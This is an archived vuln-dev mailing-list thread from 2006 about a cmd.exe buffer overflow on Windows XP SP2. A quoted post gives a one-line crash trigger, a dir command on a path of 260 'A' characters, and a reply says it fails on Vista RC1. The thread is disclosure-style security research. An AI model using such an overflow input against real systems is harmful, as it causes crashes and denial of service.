Vuln Dev
Windows Command Processor CMD.EXE Buffer Overflow Oct 19 2006 03:33AM
gregory_panakkal (gregory_panakkal fastmail fm) (2 replies)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 20 2006 11:51AM
Osvaldo Casagrande (ocasagrande diviserv com) (2 replies)
It does not works on Windows Vista RC1 (5728)

Osvaldo Casagrande
MCSE. MCT, MVP, Security+
Gerente de Servicios
DiviServ S.A.
D: 595(21) 613 828 | Cel. 595 (971) 300 836 | |: ocasagrande (at) diviserv (dot) com [email concealed] |  Add me to messenger

Busca mis referencias? / Looking for my personal references?
Acces to Programa MVP - Access to Certificaciones MS On "Transcript ID" input: 740381 / On "Access Code" input: ViewMyInfo

Running Windows Vista RC1- Build 5728 and Office 2007 Beta 2 TR

CONFIDENCIALIDAD: La informacion contenida en este mail y sus anexos es confidencial y/o privilegiada y esta reservada para el destinatario unicamente.  Si usted no es el destinatario o un agente responsable de enviar este mensaje al destinatario final, se le notifica que: No puede utilizarlo, retransmitirlo, imprimirlo, copiarlo o divulgar las informaciones contenidas en este mail o sus anexos o tomar cualquier accion basada en estas informaciones. Si usted recibe este mensaje por error, por favor avise inmediatamente al remitente, y tenga la amabilidad de borrarlo de su computadora o cualquier otro banco de datos. DIVISERV agradece su cooperacion.

This mail message may contain confidential and/or privileged information for the adressee. If you are not the addressee or authorized to receive this for the addressee, you must not use, copy, print, retransmit, disclose or take any action based on this message or any information herein. If you have received this message by mistake, please advise the sender immediately replying this message and delete it from your computer and any database. DIVISERV appreciates your cooperation.

-----Original Message-----
From: listbounce (at) securityfocus (dot) com [email concealed] [mailto:listbounce (at) securityfocus (dot) com [email concealed]] On Behalf Of gregory_panakkal
Sent: Wednesday, October 18, 2006 11:33 PM
To: vuln-dev (at) securityfocus (dot) com [email concealed]
Subject: Windows Command Processor CMD.EXE Buffer Overflow

Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low

Copy-paste the following line in cmd.exe and execute it..
(it is a single command, has been split into multiple lines for
readability sake).

%COMSPEC% /K "dir
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP Comes into the picture.

URL :
http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-
buffer-overflow.html

regards,
Gregory Panakkal
www.infogreg.com
--
gregory_panakkal
gregory_panakkal (at) fastmail (dot) fm [email concealed]

--
http://www.fastmail.fm - I mean, what is it about a decent email service?

[ reply ]
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 21 2006 02:05PM
RockyH (rocky he g-wizinnovations com)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 20 2006 10:51PM
Marvin Simkin (Marvin Simkin asu edu) (2 replies)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 21 2006 12:22PM
gregory_panakkal (gregory_panakkal fastmail fm) (2 replies)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 23 2006 03:05PM
Marvin Simkin (Marvin Simkin asu edu)
Re: Windows Command Processor CMD.EXE Buffer Overflow Oct 22 2006 01:01PM
Dan Yefimov (dan ns15 lightwave net ru) (2 replies)
Re: Windows Command Processor CMD.EXE Buffer Overflow Oct 22 2006 10:24PM
Danux (danuxx gmail com)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 22 2006 07:56PM
Luis Alberto Cortes Zavala (napasn securitynation com) (1 replies)
Re: Windows Command Processor CMD.EXE Buffer Overflow Oct 23 2006 04:51PM
Dan Yefimov (dan ns15 lightwave net ru)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 20 2006 10:57PM
Marvin Simkin (Marvin Simkin asu edu)
Re: Windows Command Processor CMD.EXE Buffer Overflow Oct 20 2006 08:58AM
The SNiFF (thesniff gmail com) (1 replies)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 20 2006 07:33PM
Luis Alberto Cortes Zavala (napasn securitynation com)


 

Privacy Statement
Copyright 2010, SecurityFocus